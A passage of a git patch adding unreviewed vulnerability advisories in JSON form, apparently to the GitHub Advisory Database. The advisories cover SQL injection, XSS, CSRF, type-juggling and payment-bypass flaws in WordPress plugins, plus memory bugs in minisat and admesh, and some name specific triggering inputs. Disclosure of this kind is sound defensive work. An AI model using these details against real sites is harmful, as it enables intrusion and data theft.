+ "nvd_published_at": "2026-02-18T08:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json
new file mode 100644
index 0000000000000..8b16527cca469
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qfwf-756h-2p4g/GHSA-qfwf-756h-2p4g.json
@@ -0,0 +1,60 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qfwf-756h-2p4g",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2644"
+ ],
+ "details": "A weakness has been identified in niklasso minisat up to 2.2.0. This issue affects the function Solver::value in the library core/SolverTypes.h of the component DIMACS File Parser. This manipulation of the argument variable index with the input 2147483648 causes out-of-bounds read. The attack needs to be launched locally. The exploit has been made available to the public and could be used for attacks. The project was informed of the problem early through an issue report but has not responded yet.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:L"
+ },
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:L/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2644"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/niklasso/minisat/issues/55"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/niklasso/minisat/issues/55#issue-3832527387"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/niklasso/minisat"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?ctiid.346406"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?id.346406"
+ },
+ {
+ "type": "WEB",
+ "url": "https://vuldb.com/?submit.752775"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-119"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:11Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json
new file mode 100644
index 0000000000000..7321ce7053113
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-qj9g-q4j9-47hp/GHSA-qj9g-q4j9-47hp.json
@@ -0,0 +1,52 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-qj9g-q4j9-47hp",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2112"
+ ],
+ "details": "The Dam Spam plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.0.8. This is due to missing nonce verification on the pending comment deletion action in the cleanup page. This makes it possible for unauthenticated attackers to delete all pending comments via a forged request granted they can trick an admin into performing an action such as clicking on a link.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2112"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/webguyio/dam-spam/blob/52e12fb455e7b670af2e0713f9da84d2d1d309ac/settings/cleanup.php#L92"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/dam-spam/tags/1.0.6/settings/cleanup.php#L92"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/dam-spam/trunk/settings/cleanup.php#L92"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3457369%40dam-spam&new=3457369%40dam-spam&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/e336dc27-4a76-4197-929c-b221f42bfe69?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-352"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T08:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json
new file mode 100644
index 0000000000000..1ce5960d7bf73
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-rg7x-c263-823c/GHSA-rg7x-c263-823c.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-rg7x-c263-823c",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-2495"
+ ],
+ "details": "The WPNakama – Team and multi-Client Collaboration, Editorial and Project Management plugin for WordPress is vulnerable to SQL Injection via the 'order' parameter of the '/wp-json/WPNakama/v1/boards' REST API endpoint in all versions up to, and including, 0.6.5. This is due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for unauthenticated attackers to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2495"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama-api.php#L209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wpnakama/tags/0.6.5/inc/class-wpnakama.php#L215"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama-api.php#L209"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wpnakama/trunk/inc/class-wpnakama.php#L215"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3461315%40wpnakama&new=3461315%40wpnakama&sfp_email=&sfph_mail="
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/7ffa92be-9d38-40d9-954d-d890136b5aa1?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-89"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T09:15:59Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json
new file mode 100644
index 0000000000000..2364f3a755ee7
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-wxhm-86c2-x66c/GHSA-wxhm-86c2-x66c.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-wxhm-86c2-x66c",
+ "modified": "2026-02-18T09:31:03Z",
+ "published": "2026-02-18T09:31:03Z",
+ "aliases": [
+ "CVE-2026-1640"
+ ],
+ "details": "The Taskbuilder – WordPress Project Management & Task Management plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 5.0.2. This is due to missing authorization checks on the project and task comment submission functions (AJAX actions: wppm_submit_proj_comment and wppm_submit_task_comment). This makes it possible for authenticated attackers, with subscriber-level access and above, to create comments on any project or task (including private projects they cannot view or are not assigned to), and inject arbitrary HTML and CSS via the insufficiently sanitized comment_body parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1640"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/projects/open_project/wppm_submit_project_comment.php#L6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/taskbuilder/tags/5.0.2/includes/admin/tasks/open_task/wppm_submit_task_comment.php#L6"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/66095908-875f-486d-ae77-6015671872de?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T07:16:09Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json
new file mode 100644
index 0000000000000..be96604f860ee
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-xf7v-j2cc-2crf/GHSA-xf7v-j2cc-2crf.json
@@ -0,0 +1,64 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-xf7v-j2cc-2crf",
+ "modified": "2026-02-18T09:31:04Z",
+ "published": "2026-02-18T09:31:04Z",
+ "aliases": [
+ "CVE-2026-1941"
+ ],
+ "details": "The WP Event Aggregator plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'wp_events' shortcode in all versions up to, and including, 1.8.7 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1941"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L56"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L567"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/tags/1.8.7/includes/class-wp-event-aggregator-cpt.php#L761"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L56"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L567"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/wp-event-aggregator/trunk/includes/class-wp-event-aggregator-cpt.php#L761"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3455440/wp-event-aggregator#file18"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/50d8f1e0-2022-4fe1-b384-ca762a032d3c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T09:15:58Z"
+ }
+}
\ No newline at end of file
From 624ae4cb87ec63f45622fd36ef58c9a94b7a2d4d Mon Sep 17 00:00:00 2001 From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Wed, 18 Feb 2026 12:32:38 +0000 Subject: [PATCH 003/174] Publish Advisories GHSA-23h7-68rq-jgvf GHSA-2pc4-pm2m-q53r GHSA-3vq8-64jx-f882 GHSA-9pr5-g9xr-gp22 GHSA-fq68-cwcx-p92f GHSA-pm8v-w3f2-2hxx GHSA-vcj6-96x2-26j3 GHSA-w2w8-j4gc-v26q --- .../GHSA-23h7-68rq-jgvf.json | 56 ++++++++++++++++ .../GHSA-2pc4-pm2m-q53r.json | 48 ++++++++++++++ .../GHSA-3vq8-64jx-f882.json | 44 +++++++++++++ .../GHSA-9pr5-g9xr-gp22.json | 48 ++++++++++++++ .../GHSA-fq68-cwcx-p92f.json | 52 +++++++++++++++ .../GHSA-pm8v-w3f2-2hxx.json | 48 ++++++++++++++ .../GHSA-vcj6-96x2-26j3.json | 64 +++++++++++++++++++ .../GHSA-w2w8-j4gc-v26q.json | 48 ++++++++++++++ 8 files changed, 408 insertions(+) create mode 100644 advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json create mode 100644 advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json create mode 100644 advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json create mode 100644 advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json create mode 100644 advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json create mode 100644 advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json create mode 100644 advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json create mode 100644 advisories/unreviewed/2026/02/GHSA-w2w8-j4gc-v26q/GHSA-w2w8-j4gc-v26q.json
diff --git a/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json b/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json
new file mode 100644
index 0000000000000..5630e02bd42b0
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-23h7-68rq-jgvf/GHSA-23h7-68rq-jgvf.json
@@ -0,0 +1,56 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-23h7-68rq-jgvf",
+ "modified": "2026-02-18T12:31:10Z",
+ "published": "2026-02-18T12:31:10Z",
+ "aliases": [
+ "CVE-2025-13727"
+ ],
+ "details": "The Video Share VOD – Turnkey Video Site Builder Script plugin for WordPress is vulnerable to Stored Cross-Site Scripting via plugin settings in all versions up to, and including, 2.7.11 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with editor-level permissions and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. This only affects multi-site installations and installations where unfiltered_html has been disabled.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13727"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/tags/2.7.11/inc/shortcodes.php#L2226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/tags/2.7.11/inc/shortcodes.php#L748"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/trunk/inc/shortcodes.php#L2226"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/video-share-vod/trunk/inc/shortcodes.php#L748"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3463296"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/776a441b-1bb8-46ea-9884-4abf562f6e5c?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T10:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json b/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json
new file mode 100644
index 0000000000000..e79fa4e9211d6
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-2pc4-pm2m-q53r/GHSA-2pc4-pm2m-q53r.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-2pc4-pm2m-q53r",
+ "modified": "2026-02-18T12:31:11Z",
+ "published": "2026-02-18T12:31:11Z",
+ "aliases": [
+ "CVE-2025-14799"
+ ],
+ "details": "The Brevo - Email, SMS, Web Push, Chat, and more. plugin for WordPress is vulnerable to authorization bypass due to type juggling in all versions up to, and including, 3.3.0. This is due to the use of loose comparison (==) instead of strict comparison (===) when validating the installation ID in the `/wp-json/mailin/v1/mailin_disconnect` REST API endpoint. This makes it possible for unauthenticated attackers to disconnect the Brevo integration, delete the API key, remove all subscription forms, and reset plugin settings by sending a boolean `true` value for the `id` parameter, which bypasses the authorization check through PHP type juggling.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14799"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/mailin/tags/3.2.9/sendinblue.php#L1795"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/mailin/tags/3.2.9/sendinblue.php#L1833"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/changeset/3448639"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f29e5b19-2505-4b02-92c7-071833de6bc2?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-843"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T12:15:58Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json b/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json
new file mode 100644
index 0000000000000..bb163125f7acc
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-3vq8-64jx-f882/GHSA-3vq8-64jx-f882.json
@@ -0,0 +1,44 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-3vq8-64jx-f882",
+ "modified": "2026-02-18T12:31:10Z",
+ "published": "2026-02-18T12:31:10Z",
+ "aliases": [
+ "CVE-2025-11185"
+ ],
+ "details": "The Complianz – GDPR/CCPA Cookie Consent plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's cmplz-accept-link shortcode in all versions up to, and including, 7.4.3 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-11185"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.2/documents/class-document.php#L1174"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/complianz-gdpr/tags/7.4.2/documents/class-document.php#L21"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f0533fca-a4de-44f0-bea0-1df6a41709ca?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T10:16:13Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json b/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json
new file mode 100644
index 0000000000000..e0d8672576c9d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-9pr5-g9xr-gp22/GHSA-9pr5-g9xr-gp22.json
@@ -0,0 +1,48 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-9pr5-g9xr-gp22",
+ "modified": "2026-02-18T12:31:11Z",
+ "published": "2026-02-18T12:31:11Z",
+ "aliases": [
+ "CVE-2026-1942"
+ ],
+ "details": "The Blog2Social: Social Media Auto Post & Scheduler plugin for WordPress is vulnerable to unauthorized modification of data due to a missing capability check on the b2s_curation_draft AJAX action in all versions up to, and including, 8.7.4. The curationDraft() function only verifies current_user_can('read') without checking whether the user has edit_post permission for the target post. Combined with the plugin granting UI access and nonce exposure to all roles, this makes it possible for authenticated attackers, with Subscriber-level access and above, to overwrite the title and content of arbitrary posts and pages by supplying a target post ID via the 'b2s-draft-id' parameter.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1942"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.3/includes/Ajax/Post.php#L159"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/blog2social/tags/8.7.3/includes/B2S/Curation/Save.php#L39"
+ },
+ {
+ "type": "WEB",
+ "url": "https://plugins.trac.wordpress.org/browser/blog2social/trunk/includes/Ajax/Post.php?rev=3462464"
+ },
+ {
+ "type": "WEB",
+ "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/930e7fd6-ae0b-465a-aa93-04ef80011d32?source=cve"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-862"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-18T11:16:32Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json b/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json
new file mode 100644
index 0000000000000..079d7a6c660d4
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-fq68-cwcx-p92f/GHSA-fq68-cwcx-p92f.json
@@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-fq68-cwcx-p92f", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2025-14444" + ], + "details": "The RegistrationMagic – Custom Registration Forms, User Registration, Payment, and User Login plugin for WordPress is vulnerable to payment bypass due to insufficient verification of data authenticity on the 'process_paypal_sdk_payment' function in all versions up to, and including, 6.0.6.9. This is due to the plugin trusting client-supplied values for payment verification without validating that the payment actually went through PayPal. This makes it possible for unauthenticated attackers to bypass paid registration by manipulating payment status and activating their account without completing a real PayPal payment.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-14444" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/tags/6.0.6.7/includes/class_registration_magic.php#L232" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/tags/6.0.6.7/services/class_rm_paypal_service.php#L324" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/custom-registration-form-builder-with-submission-manager/trunk/services/class_rm_paypal_service.php#L324" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3426151" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/0633bf06-6580-4feb-b98a-c465df3e2bed?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345" + ], + "severity": "MODERATE", + "github_reviewed": false, + 
"github_reviewed_at": null, + "nvd_published_at": "2026-02-18T11:16:30Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json new file mode 100644 index 0000000000000..fac368002aa55 --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-pm8v-w3f2-2hxx/GHSA-pm8v-w3f2-2hxx.json 
@@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pm8v-w3f2-2hxx", + "modified": "2026-02-18T12:31:10Z", + "published": "2026-02-18T12:31:10Z", + "aliases": [ + "CVE-2026-2126" + ], + "details": "The User Submitted Posts – Enable Users to Submit Posts from the Front End plugin for WordPress is vulnerable to Incorrect Authorization in all versions up to, and including, 20260113. This is due to the `usp_get_submitted_category()` function accepting user-submitted category IDs from the POST body without validating them against the admin-configured allowed categories stored in `usp_options['categories']`. This makes it possible for unauthenticated attackers to assign submitted posts to arbitrary categories, including restricted ones, by crafting a direct POST request with manipulated `user-submitted-category[]` values, bypassing the frontend category restrictions.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2126" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L1431" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/user-submitted-posts/tags/20260113/user-submitted-posts.php#L298" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3463696%40user-submitted-posts%2Ftrunk&old=3456521%40user-submitted-posts%2Ftrunk&sfp_email=&sfph_mail=" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/02c5e3ad-5cc3-40b1-a15a-10d53383abe6?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-863" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2026-02-18T10:16:15Z" + } +} \ No newline at end of 
file diff --git a/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json new file mode 100644 index 0000000000000..9a1c8c221619a --- /dev/null +++ b/advisories/unreviewed/2026/02/GHSA-vcj6-96x2-26j3/GHSA-vcj6-96x2-26j3.json 
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-vcj6-96x2-26j3", + "modified": "2026-02-18T12:31:11Z", + "published": "2026-02-18T12:31:11Z", + "aliases": [ + "CVE-2026-2653" + ], + "details": "A security flaw has been discovered in admesh up to 0.98.5. This issue affects the function stl_check_normal_vector of the file src/normals.c. Performing a manipulation results in heap-based buffer overflow. The attack must be initiated from a local position. The exploit has been released to the public and may be used for attacks. It looks like this product is not really maintained anymore.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L" + }, + { + "type": "CVSS_V4", + "score": 